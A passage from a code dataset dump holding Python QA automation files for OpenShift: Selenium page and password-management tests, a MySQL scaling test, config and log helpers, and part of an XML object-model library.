'''//div[@id='node-10295']/div/ol/li[2]''')\n web.assert_text_equal_by_xpath('''With OpenShift, if the tests and build are successful, the new code gets deployed. If it fails, the old code continues to run with no downtime related to the push.''', '''//div[@id='node-10295']/div/ol/li[3]''') \n web.assert_text_equal_by_xpath('''Users can review the persistent build history maintained by Jenkins''', '''//div[@id='node-10295']/div/ol/li[4]''')\n web.assert_text_equal_by_xpath('''How can you get started? First, make sure you are running the latest rhc tools (gem update rhc or yum update rhc). Then follow these steps:''', '''//div[@id='node-10295']/div/p[4]''') \n web.assert_text_equal_by_xpath('''Step 1 - Create Jenkins''', '''//div[@id='node-10295']/div/h3''')\n web.assert_text_equal_by_xpath('''$ rhc app create -a jenkins -t jenkins-1.4''', '''//div[@id='node-10295']/div/pre/code''') \n web.assert_text_equal_by_xpath('''Note the administrator username and password that is created and returned from rhc. This will be needed to administer Jenkins.''', '''//div[@id='node-10295']/div/p[5]''') \n web.assert_text_equal_by_xpath('''Step 2 - Create an Application with Embedded Jenkins''', '''//div[@id='node-10295']/div/h3[2]''')\n web.assert_text_equal_by_xpath('''For a new application:''', '''//div[@id='node-10295']/div/p[6]''')\n web.assert_text_equal_by_xpath('''$ rhc app create -a jboss1 -t jbossas-7 --enable-jenkins''', '''//div[@id='node-10295']/div/pre[2]/code''') \n web.assert_text_equal_by_xpath('''For an existing application:''', '''//div[@id='node-10295']/div/p[7]''')\n web.assert_text_equal_by_xpath('''$ rhc app cartridge add -a jboss1 -c jenkins-client-1.4''', '''//div[@id='node-10295']/div/pre[3]/code''') \n web.assert_text_equal_by_xpath('''This will create a Jenkins Job specifically configured for the application including parameters such as the builder size, DNS resolution timeout, and the application's git repo URL. These parameters and more can be managed via the Jenkins web UI.''', '''//div[@id='node-10295']/div/p[8]''')\n web.assert_text_equal_by_xpath('''Step 3 - Modify and Push your Application''', '''//div[@id='node-10295']/div/h3[3]''')\n web.assert_text_equal_by_xpath('''$ git push''', '''//div[@id='node-10295']/div/pre[4]/code''')\n web.assert_text_equal_by_xpath('''This will trigger the build/test/deploy sequence in Jenkins.''', '''//div[@id='node-10295']/div/p[9]''')\n web.assert_text_equal_by_xpath('''When a build is triggered, Jenkins first needs to schedule the build. The scheduling process involves creating a temporary builder for the application. On the Jenkins side, a Node (aka Slave) is created. In OpenShift, a corresponding builder Application is created named appnamebldr. If the Node/builder already exists at scheduling then the existing builder will be used and the build will immediately fire. NOTE: This Node and builder Application will consume one Gear. Nodes and builder Applications are automatically deleted and the corresponding Gear is freed after 15 idle minutes.''', '''//div[@id='node-10295']/div/p[10]''')\n web.assert_text_equal_by_xpath('''To troubleshoot errors that occur during the build/test/deploy phase with Jenkins, from a git push, etc. there are three logs that will indicate the problem in most cases.''', '''//div[@id='node-10295']/div/p[11]''')\n web.assert_text_equal_by_xpath('''Logging for Application level errors (e.g. compilation failures, test failures) is available via the Jenkins web UI under the corresponding Node's build history.''', '''//div[@id='node-10295']/div/p[12]''')\n web.assert_text_equal_by_xpath('''Logging for Jenkins level errors (e.g. DNS timeouts, builder configuration) is available in the Jenkins logs at:''', '''//div[@id='node-10295']/div/p[13]''')\n web.assert_text_equal_by_xpath('''$ rhc app tail -a jenkins''', '''//div[@id='node-10295']/div/pre[5]/code''')\n web.assert_text_equal_by_xpath('''$ rhc app tail -a jboss1''', '''//div[@id='node-10295']/div/pre[6]/code''')\n web.click_element_by_link_text(\"Subscribe To This Thread\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n web.go_back() \n web.click_element_by_link_text(\"Subscribe To: Posts Of Type Page\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n web.go_back()\n web.click_element_by_link_text(\"Subscribe To [email protected]\")\n web.check_title(\"Confirm your subscription | OpenShift by Red Hat\")\n \n self.tearDown()\n\n return self.passed(\"Case 163038 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Check_jenkins_page)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_163038.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6411368250846863, "alphanum_fraction": 0.6449903845787048, "avg_line_length": 27.83333396911621, "blob_id": "3ca66092eb6a977ddfda364ade489152559b8009", "content_id": "14182de5fee08d1f7d6f54093f77fa49a8f6aa1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2076, "license_type": "no_license", "max_line_length": 92, "num_lines": 72, "path": "/automation/open/lib/storage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nfile for getting config\n\"\"\"\nimport database\nimport simplejson as json\nimport dictlib\nimport os\nimport commands\nimport sys\nfile_path = os.path.dirname(os.path.realpath(__file__))\nwork_dir = os.path.abspath(file_path + \"/../\")\n\n\ndef get_config():\n \"\"\"\n return a dot accessible dictionary of default configurations. Will try to\n read from a local storage (a json file) or from an extrenal db if nothing\n can be read from local\n \"\"\"\n config = None\n \n try:\n fname = os.path.join(work_dir, \"etc\", \"config.json\")\n if os.environ.has_key(\"RHTEST_HOME\"):\n fname = os.path.join(os.environ[\"RHTEST_HOME\"], \"etc\", \"config.json\")\n config_json = open(fname, 'r')\n config_str = json.load(config_json)\n config = dictlib.AttrDictWrapper(config_str)\n except:\n print >>sys.stderr, \"Error encountered reading from local, trying from remote DB...\"\n config_dict = database.get_defaults()\n config = dictlib.AttrDictWrapper(config_dict)\n return config\n\ndef get_logfilename(cf):\n import logfile\n user_name = commands.getoutput('whoami')\n lfd = \"/var/tmp/%s\" % user_name\n if not os.path.isdir(lfd):\n os.mkdir(lfd)\n logfilename = os.path.join(os.path.expanduser(lfd), cf.logbasename)\n cf['logfilename'] = logfilename\n return logfilename\n\ndef get_logfile(cf):\n import logfile\n lfname = get_logfilename(cf)\n\n try:\n lf = logfile.ManagedLog(lfname, 1000000)\n except:\n ex, val, tb = sys.exc_info()\n print >>sys.stderr, \"get_logfile: Could not open log file.\"\n print >>sys.stderr, ex, val\n return _StdErrLog()\n else:\n return lf\n \ndef get_report(cf):\n import reports\n # take out extension\n logname_without_extension = os.path.splitext(cf.logbasename)[0]\n log_path = os.path.join(cf.resultsdir, logname_without_extension)\n \n params = ('StandardReport', log_path ,'text/html')\n return reports.get_report(params)\n\ndef get_ui(cf):\n import CLI\n return CLI.get_terminal_ui(cf)\n" }, { "alpha_fraction": 0.685756266117096, "alphanum_fraction": 0.6922593116760254, "avg_line_length": 50.25806427001953, "blob_id": "9da36f208413da79558e20c1b6226354e42d31f5", "content_id": "bda22b1ae49441909b7bad4671215d40f2a4ae3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4767, "license_type": "no_license", "max_line_length": 169, "num_lines": 93, "path": "/automation/open/testmodules/UI/web/tc_passwordmanage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\n\nclass ManagePassword(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_a_reset_pwd_with_blank_email(self):\n baseutils.reset_password(self,\"\")\n baseutils.assert_text_equal_by_css(self,\"This field is required.\",\"label.error\")\n \n def test_b_reset_pwd_with_invalid_email(self):\n baseutils.reset_password(self,\"1234567\")\n baseutils.assert_text_equal_by_css(self,\"Please enter a valid email address.\",\"label.error\")\n\n def test_c_reset_pwd_with_existing_account(self):\n baseutils.reset_password(self,\"[email protected]\")\n baseutils.assert_text_equal_by_css(self,\"The information you have requested has been emailed to you at [email protected].\",\"div.message.success\") \n \n def test_ca_reset_pwd_without_refresh(self):\n baseutils.reset_password(self,\"[email protected]\")\n time.sleep(5)\n baseutils.assert_element_present_by_xpath(self,\"//div[@id='password-reset-form']/form/div/input[@type='hidden']\")\n \n# self.driver.assertFalse(self.is_element_present(By.CSS_SELECTOR, \"#password-reset-form > form > input.button\"))\n \n def test_cb_reset_pwd_with_refresh(self):\n baseutils.reset_password(self,\"[email protected]\")\n# self.driver.assertFalse(self.is_element_present(By.ID,\"email_input\"))\n# baseutils.assert_element_not_present_by_css(self,\"#password-reset-form > form > input.button\")\n self.driver.refresh()\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.click_element_by_xpath(self,\"//*[@id='lost_password']/p/a\")\n time.sleep(2)\n baseutils.assert_element_present_by_id(self,\"email_input\")\n baseutils.assert_element_present_by_css(self,\"#password-reset-form > form > input.button\")\n \n def test_d_reset_pwd_with_non_existing_account(self):\n baseutils.reset_password(self,\"[email protected]\")\n baseutils.assert_text_equal_by_css(self,\"The information you have requested has been emailed to you at [email protected].\",\"div.message.success\")\n\n \n def test_e_change_pwd_w_incorrect_oldpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],\"654321\",config.tochangepwduser[2],config.tochangepwduser[2])\n baseutils.assert_text_equal_by_css(self,\"Your old password was incorrect\",\"div.message.error\")\n \n def test_f_change_pwd_w_invalid_newpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],\"12345\",\"12345\")\n baseutils.assert_text_equal_by_css(self,\"PLEASE ENTER AT LEAST 6 CHARACTERS.\",\"fieldset.confirm > label.error\")\n \n def test_g_change_pwd_w_mismatch_newpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],\"123456\",\"1234567\")\n baseutils.assert_text_equal_by_css(self,\"PLEASE ENTER THE SAME VALUE AGAIN.\",\"fieldset.confirm > label.error\")\n \n def test_h_change_pwd_w_blank_oldpwd(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],\"\",\"123456\",\"123456\")\n baseutils.assert_text_equal_by_css(self,\"THIS FIELD IS REQUIRED.\",\"label.error\")\n \n def test_i_change_pwd_normally(self):\n baseutils.change_password(self,config.tochangepwduser[0],config.tochangepwduser[1],config.tochangepwduser[1],config.tochangepwduser[2],config.tochangepwduser[2])\n baseutils.assert_text_equal_by_css(self,\"Your password has been successfully changed\",\"div.message.success\")\n \n def test_z_login_with_changed_pwd(self):\n baseutils.go_to_home(self)\n baseutils.go_to_signin(self)\n baseutils.login(self,config.tochangepwduser[0],config.tochangepwduser[2])\n time.sleep(5)\n baseutils.check_title(self,\"OpenShift by Red Hat | Cloud Platform\")\n baseutils.assert_element_present_by_link_text(self,\"Sign out\") \n _greetings=baseutils.generate_greetings(config.tochangepwduser[0])\n baseutils.assert_element_present_by_link_text(self,_greetings)\n \n def tearDown(self):\n self.driver.quit()\n if len(self.verificationErrors)==1:\n self.assertEqual([''], self.verificationErrors)\n else:self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5713208913803101, "alphanum_fraction": 0.5765969753265381, "avg_line_length": 36.11188888549805, "blob_id": "35f7d554c35d4cd1c13b2a6e8942a8318b9a3abf", "content_id": "1b9774c1a8059aaf11b0d4f17efcb2cd5035c910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5307, "license_type": "no_license", "max_line_length": 132, "num_lines": 143, "path": "/automation/open/testmodules/RT/scaling/python27_scaling_mysql.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n self.app_name = 'mypython' + common.getRandomString()\n self.rest_client = openshift.Openshift(host=self.config.instance_info['ip'],\n user=self.user_email, \n passwd=self.user_passwd)\n self.app_type = common.app_types[\"python-2.7\"]\n \n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass PythonMysqlScaling(OpenShiftTest):\n def check_mysql_result(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n return common.grep_web_page(\"http://%s/mysql\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", 5, 4)\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name],\n expect_description = \"App should be created successfully\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Copy template files\",\n \"cp '%s/cartridge/app_template/mysql/applicationpython-2.7' '%s/wsgi/application'\" % (WORK_DIR + \"/../\", self.app_name),\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Install MySQL-python\",\n \"sed -i -e \\\"s/#\\s*'MySQL-python',/'MySQL-python',/g\\\" %s/setup.py\" %(self.app_name),\n expect_description = \"Operaion must be successfull\",\n expect_return = 0\n ))\n #5\n self.steps_list.append(testcase.TestCaseStep(\n \"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0\n ))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result\",\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0\n ))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [ self.app_name ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n\n for i in range(1,4):\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - %d\" % i,\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-down the application via Rest API\",\n common.scale_down,\n function_parameters = [ self.app_name ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n function_parameters = [ self.app_name ],\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0\n ))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0\n ))\n\n case = testcase.TestCase(\"[US2005][Runtime][rhc-cartridge]Embed mysql to scalable apps: python\", self.steps_list)\n case.run()\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonMysqlScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6683411598205566, "alphanum_fraction": 0.6711255311965942, "avg_line_length": 26.429922103881836, "blob_id": "7474591ddb0846a27939c3ddf62b37d699fc8405", "content_id": "821b65366f670e79067250281839b8c2647ac278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34837, "license_type": "no_license", "max_line_length": 140, "num_lines": 1270, "path": "/automation/open/lib/supports/XML/POM.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python -i\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# License: LGPL\n# Keith Dart <[email protected]>\n\n\"\"\"\nThis module implements the XML POM -- the Python Object Model for XML. It is\nsomething like DOM, but more Pythonic, and easier to use. These base classes\nare used to build POM source files which are self-validating python-based XML\nconstructor objects. The major parts of the dtd2py command line tool are also\nhere.\n\n\"\"\"\n\nimport sys, os, re\n\n\ntry:\n\tfrom cStringIO import StringIO\nexcept ImportError:\n\tfrom StringIO import StringIO\n\nfrom textutils import identifier, maketrans\n\nDEFAULT_ENCODING = \"utf-8\"\n\ndef set_default_encoding(newcodec):\n\tglobal DEFAULT_ENCODING \n\tDEFAULT_ENCODING = str(newcodec)\n\ntry:\n\tTrue\nexcept NameError:\n\tTrue = 1\n\tFalse = 0\n\n\nclass ValidationError(ValueError):\n\t\"\"\"ValidationError\n\tThis exception is raised when an attempt is made to construct an XML POM\n\ttree that would be invalid.\n\n\t\"\"\"\n\tpass\nadd_exception(ValidationError)\n\ndef get_getter(dtdmod):\n\tdef _element_getter(dtdmod, nodename):\n\t\treturn getattr(dtdmod, identifier(nodename))\n\treturn curry(_element_getter, dtdmod)\n\n\n#########################################################\n# XML generating classes\n# These classes are used to generate XML documents, similar to DOM. But, this\n# interface is simpler and more Python-ic.\n#########################################################\n# plain text data to be added to a GenericNode.\n# This class needs to support much of the ElementNode interface, but\n# implemented differently.\nclass Text(object):\n\tdef __init__(self, data=\"\", encoding=None):\n\t\tself._parent = None\n\t\tself.set_text(data, encoding)\n\tdef set_text(self, data, encoding=None):\n\t\tenc = encoding or DEFAULT_ENCODING\n\t\tself.data = unescape(POMString(data, enc))\n\t\tself.encoding = enc\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data, encoding=None):\n\t\tself.data = unescape(POMString(data, encoding or self.encoding)) + self.data\n\tdef add_text(self,data, encoding=None):\n\t\tself.data += unescape(POMString(data, encoding or self.encoding))\n\tappend = add_text\n\t__iadd__ = add_text\n\tdef __str__(self):\n\t\treturn escape(str(self.data))\n\tdef __unicode__(self):\n\t\treturn escape(self.data)\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%r)\" % (cl.__module__, cl.__name__, escape(self.data))\n\tdef __len__(self):\n\t\treturn len(self.data)\n\tdef __getslice__(self, start, end):\n\t\treturn self.data[start:end]\n\tdef __setslice__(self, start, end, v):\n\t\tself.data[start:end] = v\n\tdef __delslice__(self, start, end):\n\t\tdel self.data[start:end]\n\tdef get_escape_length(self):\n\t\treturn len(escape(self.data))\n\tdef destroy(self):\n\t\tself.data = None\n\t\tself._parent = None\n\tdef fullpath(self):\n\t\tif self._parent:\n\t\t\treturn \"%s = %r\" % (self._parent.fullpath(), self.data)\n\t\telse:\n\t\t\treturn `self.data`\n\tdef emit(self, fo):\n\t\tfo.write( escape(self.data) )\n\t# dummy methods, for polymorphism with ElementNode\n\tdef matchpath(self, pe):\n\t\treturn 0\n\tdef has_children(self):\n\t\treturn 0\n\tdef has_attributes(self):\n\t\treturn 0\n\nclass Comment(Text):\n\tdef __init__(self, data=\"\", encoding=None):\n\t\tself.data = POMString(data, encoding or DEFAULT_ENCODING)\n\t\tself._parent = None\n\tdef __str__(self):\n\t\treturn \"<!-- %s -->\" % (self._fix(self.data),)\n\tdef __unicode__(self):\n\t\treturn u\"<!-- %s -->\" % (self._fix(self.data),)\n\tdef emit(self, fo):\n\t\tfo.write( self.__str__() )\n\tdef set_text(self, data):\n\t\tself.data = POMString(data)\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data):\n\t\tself.data = POMString(data) + self.data\n\tdef add_text(self,data, encoding=None):\n\t\tself.data += POMString(data, encoding or DEFAULT_ENCODING)\n\tappend = add_text\n\tdef _fix(self, data):\n\t\tdata = escape(data)\n\t\tif data.find(u\"--\") != -1:\n\t\t\tdata = data.replace(u\"--\", u\"- \")\n\t\treturn data\n\nclass ASIS(object):\n\t\"\"\"Holder for pre-made markup that may be inserted into POM tree. It is a\n\ttext leaf-node only. You can cache pre-constructed markup and insert it\n\tinto the POM to speed up some page emission. \"\"\"\n\tdef __init__(self, data, encoding=None):\n\t\tself._parent = None\n\t\tself.set_text(data, encoding)\n\tdef set_text(self, data, encoding=None):\n\t\tenc = encoding or DEFAULT_ENCODING\n\t\tself.data = POMString(data, enc)\n\t\tself.encoding = enc\n\tdef get_text(self):\n\t\treturn self.data\n\tdef insert(self, data, encoding=None):\n\t\traise NotImplementedError\n\tdef add_text(self,data, encoding=None):\n\t\traise NotImplementedError\n\tappend = add_text\n\t__iadd__ = add_text\n\tdef __str__(self):\n\t\treturn str(self.data)\n\tdef __unicode__(self):\n\t\treturn self.data\n\tdef __repr__(self):\n\t\tcl = self.__class__\n\t\treturn \"%s.%s()\" % (cl.__module__, cl.__name__)\n\tdef __len__(self):\n\t\treturn len(self.data)\n\tdef __getslice__(self, start, end):\n\t\treturn self.data[start:end]\n\tdef __setslice__(self, start, end, v):\n\t\tself.data[start:end] = v\n\tdef __delslice__(self, start, end):\n\t\tdel self.data[start:end]\n\tdef get_escape_length(self):\n\t\treturn len(self.data)\n\tdef destroy(self):\n\t\tself.data = None\n\t\tself._parent = None\n\tdef fullpath(self):\n\t\tif self._parent:\n\t\t\treturn \"%s = %r\" % (self._parent.fullpath(), self.data)\n\t\telse:\n\t\t\treturn `self.data`\n\tdef emit(self, fo):\n\t\tfo.write( self.data )\n\t# dummy methods, for polymorphism with ElementNode\n\tdef matchpath(self, pe):\n\t\treturn 0\n\tdef has_children(self):\n\t\treturn 0\n\tdef has_attributes(self):\n\t\treturn 0\n\n\n# abstract base class for generic XML node generation. \n# Create an XML node by subclassing this and defining allowed attribute names\n# in ATTLIST. CONTENTMODEL holds the content specification from the DTD.\n# Use the dtd2py program to convert a DTD to a python module that has classes\n# for element types. Use that python dtd as a paramter for the POMDocument,\n# below.\n\nclass ElementNode(object):\n\tATTLIST = None\n\tCONTENTMODEL = None\n\t_name = None\n\t_namespace = None\n\t_acquired = {\"_namespace\":None } # default acquired values\n\tdef __init__(self, **attribs):\n\t\tself._attribs = {}\n\t\tfor key, value in attribs.items():\n\t\t\tif self._validate_attribute(key, value):\n\t\t\t\tself._attribs[key] = value\n\t\t\telse:\n\t\t\t\traise ValidationError, \"invalid attribute name for this element\"\n\t\tself._children = []\n\t\tself._parent = None\n\n \t# check if attribute name is defined for this element\n\tdef _validate_attribute_name(self, name):\n\t\tif self.ATTLIST:\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\treturn True\n\t\treturn False\n\n\tdef _validate_attribute(self, name, value):\n\t\tif self.ATTLIST:\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\treturn xmlattr.verify(value)\n\t\treturn False\n\t\n\tdef _verify_attributes(self):\n\t\tif not self.ATTLIST:\n\t\t\treturn None\n\t\tfor attr in self.ATTLIST:\n\t\t\taval = self._attribs.get(attr.name, None)\n\t\t\tif aval is None:\n\t\t\t\tif attr.a_decl == REQUIRED:\n\t\t\t\t\traise ValidationError, \"required attribute not present: \" + attr.name\n\t\t\telse:\n\t\t\t\tattr.verify(aval)\n\n\tdef _get_attribute(self, name):\n\t\tif not self.ATTLIST:\n\t\t\treturn None\n\t\ttry:\n\t\t\treturn self._attribs[name]\n\t\texcept KeyError:\n\t\t\t# might be implied, fixed, or enum...\n\t\t\tfor xmlattr in self.ATTLIST:\n\t\t\t\tif name == xmlattr.name:\n\t\t\t\t\tif xmlattr.a_decl == IMPLIED:\n\t\t\t\t\t\treturn \"\"\n\t\t\t\t\telif xmlattr.a_decl == FIXED:\n\t\t\t\t\t\treturn xmlattr.default\n\t\t\t\t\telif xmlattr.a_decl == DEFAULT: # an enum type\n\t\t\t\t\t\treturn xmlattr.default\n\t\treturn None\n\t\t\n\tdef get_parent(self):\n\t\treturn self._parent\n\t\n\tdef reparent(self, newparent):\n\t\tif self._parent:\n\t\t\ti = self._parent.index(self)\n\t\t\tdel self._parent[i]\n\t\tnewparent.append(self)\n\t\n\tdef detach(self):\n\t\tself._parent = None\n\n\tdef destroy(self):\n\t\t\"\"\"destroy() Remove this node and all child node references.\"\"\"\n\t\t# remove parent _children list reference\n\t\tif self._parent:\n\t\t\ti = self._parent.index(self)\n\t\t\tdel self._parent[i]\n\t\tself._parent = None\n\t\tfor n in self._children:\n\t\t\tn.detach()\n\t\tself._children = None\n\t\n\tdef set_namespace(self, ns):\n\t\tself._namespace = ns\n\n\tdef index(self, obj):\n\t\tobjid = id(obj)\n\t\ti = 0\n\t\tfor o in self._children:\n\t\t\tif id(o) == objid:\n\t\t\t\treturn i\n\t\t\ti += 1\n\t\traise ValueError, \"ElementNode: Object not contained here.\"\n\n\tdef append(self, obj):\n\t\t\"\"\"Append an existing DTD object instance.\"\"\"\n\t\tobj._parent = self\n\t\tself._children.append(obj)\n\t\n\tdef extend(self, objlist):\n\t\tfor obj in objlist:\n\t\t\tself.append(obj)\n\n\tdef insert(self, index, obj):\n\t\tobj._parent = self\n\t\tself._children.insert(index, obj)\n\n\tdef add(self, klass, **kwargs):\n\t\t\"\"\"Add an element class from a dtd module.\"\"\"\n\t\tobj = apply(klass, (), kwargs)\n\t\tself.append(obj)\n\t\treturn obj\n\n\tdef get_children(self):\n\t\treturn self._children[:]\n\n\tdef __iter__(self):\n\t\treturn iter(self._children)\n\n\tdef add_text(self, text, encoding=None):\n\t\t\"Adding text to elements is so common, there is a special method for it.\"\n\t\tif self.has_children() and isinstance(self._children[-1], Text):\n\t\t\tself._children[-1].add_text(text, encoding)\n\t\telse:\n\t\t\tt = Text(text, encoding)\n\t\t\tself.append(t)\n\t\n\tdef replace_text(self, text):\n\t\tif self._children:\n\t\t\tdel self._children[-1]\n\t\tself.append(Text(text))\n\n\tdef __len__(self):\n\t\treturn len(self._children)\n\t\n\t# The truth is, we exist.\n\tdef __nonzero__(self):\n\t\treturn True\n\n\tdef hasAttributes(self):\n\t\treturn len(self._attribs)\n\thas_attributes = hasAttributes\n\t\n\tdef has_attribute(self, name):\n\t\tif name in self._attribs.keys():\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef attributes(self):\n\t\treturn map(lambda o: o.name, self.ATTLIST)\n\n\tdef has_children(self):\n\t\treturn len(self._children)\n\n\tdef set_attribute(self, name, val):\n\t\t\"\"\"set_attribute(name, value)\n\t\tThis exists to set attributes that have names with characters that make\n\t\tit an illegal Python identifier. \"\"\"\n\t\tif self._validate_attribute(name, val):\n\t\t\tself._attribs[name] = val\n\n\tdef get_attribute(self, name):\n\t\t\"\"\"get_attribute(name)\n\t\tUse this method to get attributes that have names with characters that make\n\t\tit an illegal Python identifier. \"\"\"\n\t\treturn self._get_attribute(name)\n\n\tdef __setattr__(self, name, value):\n\t\tif self._validate_attribute(name, value):\n\t\t\tself._attribs[name] = value\n\t\telse:\n\t\t\tself.__dict__[name] = value\n\n\t# this plus the _parent and _acquired attributes implement \"acquisiton\", \n\t# or run-time inheritance.\n\tdef __getattr__(self, name):\n\t\tdefval = self._get_attribute(name)\n\t\tif defval is not None:\n\t\t\treturn defval\n\t\ttry:\n\t\t\treturn self._acquire(name)\n\t\texcept:\n\t\t\tpass\n\t\traise AttributeError, \"AttributeError: %s has no attribute '%s'\" % (self._name, name)\n\n\tdef _acquire(self, name):\n\t\tif self._parent:\n\t\t\ttry:\n\t\t\t\treturn self._parent.__dict__[name]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\t\treturn self._parent._acquire(name)\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn self._acquired[name]\n\t\t\texcept KeyError:\n\t\t\t\tpass\n\t\traise AttributeError\n\n\tdef __delattr__(self, name):\n\t\tdel self._attribs[name]\n\n\tdef _find_index(self, index):\n\t\tif type(index) is str:\n\t\t\tfor i in xrange(len(self._children)):\n\t\t\t\tif self._children[i].matchpath(index):\n\t\t\t\t\treturn i\n\t\t\traise IndexError, \"no elements match\"\n\t\telse:\n\t\t\treturn index\n\n\tdef __getitem__(self, index):\n\t\tif type(index) is str:\n\t\t\tel = self.get_element(index)\n\t\t\tif el is None:\n\t\t\t\traise IndexError, \"no item matches\"\n\t\t\telse:\n\t\t\t\treturn el\n\t\telse:\n\t\t\treturn self._children[index]\n\t\n\tdef __setitem__(self, index, obj):\n\t\tindex = self._find_index(index)\n\t\tobj._parent = self\n\t\tself._children[index] = obj\n\t\n\tdef __delitem__(self, index):\n\t\tindex = self._find_index(index)\n#\t\tself._children[index].destroy()\n\t\tdel self._children[index]\n\n\tdef __repr__(self):\n\t\tattrs = map(lambda t: '%s=%r' % t, self._attribs.items())\n\t\tcl = self.__class__\n\t\treturn \"%s.%s(%s)\" % (cl.__module__, cl.__name__, \", \".join(attrs))\n\n\tdef __str__(self):\n\t\tself._verify_attributes()\n\t\tif not self.CONTENTMODEL or self.CONTENTMODEL.is_empty():\n\t\t\treturn self._empty_str()\n\t\telse:\n\t\t\treturn self._non_empty_str()\n\t\n\tdef _get_ns(self):\n\t\treturn IF(self._namespace, \"%s:\" % self._namespace, \"\")\n\n\tdef _non_empty_str(self):\n\t\ts = 